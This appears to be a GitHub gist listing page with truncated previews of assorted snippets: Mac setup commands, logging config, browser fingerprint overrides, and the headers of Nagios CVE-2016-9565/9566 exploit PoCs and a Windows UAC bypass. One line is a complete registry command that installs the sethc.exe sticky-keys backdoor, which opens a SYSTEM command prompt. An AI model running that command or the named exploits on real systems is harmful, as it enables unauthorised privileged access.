This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
> cd /Applications/VMware Fusion.app/Contents/Library/VMware OVF Tool | |
> ./ovftool --acceptAllEulas /Users/marco/Documents/Virtual\ Machines.localized/Windows\ 8.1\ x64.vmwarevm/Windows\ 8.1\ x64.vmx /Users/marco/Desktop/Win81.ova |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# XCode Command Line Tools | |
>xcode-select --install | |
# Install Homebrew | |
>ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" | |
>echo PATH=/usr/local/bin:/usr/local/sbin:$PATH >> ~/.bash_profile | |
>source ~/.bash_profile | |
>brew tap homebrew/versions |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# | |
# Nagios Core < 4.2.4 Root Privilege Escalation PoC Exploit | |
# nagios-root-privesc.sh (ver. 1.0) | |
# | |
# CVE-2016-9566 | |
# | |
# Discovered and coded by: | |
# | |
# Dawid Golunski |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-UACBypass { | |
<# | |
.SYNOPSIS | |
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
intro = """\033[94m | |
Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565) | |
nagios_cmd_injection.py ver. 1.0 | |
Discovered & Coded by: | |
Dawid Golunski | |
https://legalhackers.com | |
\033[0m |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// overwrite the `languages` property to use a custom getter | |
Object.defineProperty(navigator, "languages", { | |
get: function() { | |
return ["zh-CN","zh"]; | |
} | |
}); | |
// Overwrite the `plugins` property to use a custom getter. | |
Object.defineProperty(navigator, 'plugins', { | |
// get: () => [1, 2, 3, 4, 5], |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import logging | |
import os | |
from logging.handlers import RotatingFileHandler # | |
import colorlog # 控制台日志输入颜色 | |
log_colors_config = { | |
'DEBUG': 'cyan', | |
'INFO': 'green', | |
'WARNING': 'yellow', | |
'ERROR': 'red', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# encoding: utf-8 | |
""" | |
@author: xl7dev | |
""" | |
import sys | |
import pyotp | |
import pexpect | |
import logging |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -s -XPOST https://www.hackthebox.eu/api/invite/generate | jq .data.code|sed 's/"//g'|base64 -d |
NewerOlder